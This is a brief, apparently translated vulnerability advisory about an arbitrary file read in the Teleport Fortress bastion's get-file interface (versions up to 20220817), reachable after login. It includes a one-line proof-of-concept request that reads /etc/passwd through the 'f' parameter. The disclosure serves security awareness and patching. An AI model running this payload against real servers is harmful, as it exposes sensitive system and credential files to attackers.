Teleport Fortress Get File Background Arbitrary File Reading Vulnerability
Teleport Fortress Get File Background Arbitrary File Reading Vulnerability
Teleport Fortress get-file background arbitrary file reading vulnerability
Vulnerability Description
Teleport Fortress get-file interface has a vulnerability to read arbitrary file in the background. The attacker can obtain background permissions after using any user login vulnerability, and then further use any file to read and obtain sensitive files on the server.
Vulnerability Impact
Teleport Version <= 20220817
Network surveying and mapping
Vulnerability reappears
Login page
Use POC verification after logging in
1
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
This post is licensed under CC BY 4.0 by the author.